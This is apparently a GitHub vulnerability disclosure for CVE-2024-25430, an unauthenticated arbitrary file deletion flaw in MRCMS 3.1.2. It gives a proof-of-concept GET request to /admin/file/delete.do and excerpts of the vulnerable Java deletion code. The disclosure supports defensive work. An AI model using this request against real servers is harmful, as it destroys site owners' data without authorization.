We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[The name of an affected Product]
MRCMS
[The affected or fixed version]
v3.1.2
[CVE ID] CVE-2024-25430
[Vulnerability Type]
Arbitrary file deletion vulnerability
[Vulnerability Description]
MRCMS 3.1.2 exists an arbitrary file deletion vulnerability
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/file/delete.do?path=/&name=
1.Select content->File management
2.Click the delete button
Try deleting the test.txt file
POC
GET /admin/file/delete.do?path=/&name=test.txt HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Length: 0
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
@ResponseBody @RequestMapping("/delete") public Object delete(@RequestParam("path") String path, @RequestParam("name") String name){ if(fileManager.checkPath(path)){ return new ResultMessage(false, "路径检查异常,删除失败!"); } File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name)); return fileManager.delete(file); }
Pass in the path and name variables in the code, specify the path through path, and specify the file/directory name through name
Code PathMRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
Users can delete arbitrary files without authorization because authentication is not used before file deletion.
public boolean deleteFolder(File delFolder) { // 判断目录或文件是否存在 if (!delFolder.exists()) { // 不存在返回 false return false; } else { // 判断是否为文件 if (delFolder.isFile()) { // 为文件时调用删除文件方法 return deleteFile(delFolder); } else { // 为目录时调用删除目录方法 return deleteDirectory(delFolder); } } }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
[The name of an affected Product]
[The affected or fixed version]
[CVE ID]
CVE-2024-25430
[Vulnerability Type]
[Vulnerability Description]
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/file/delete.do?path=/&name=
1.Select content->File management
2.Click the delete button
Try deleting the test.txt file
POC
code discovery
Code path:
MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
Pass in the path and name variables in the code, specify the path through path, and specify the file/directory name through name
Code Path
MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
Users can delete arbitrary files without authorization because authentication is not used before file deletion.
The text was updated successfully, but these errors were encountered: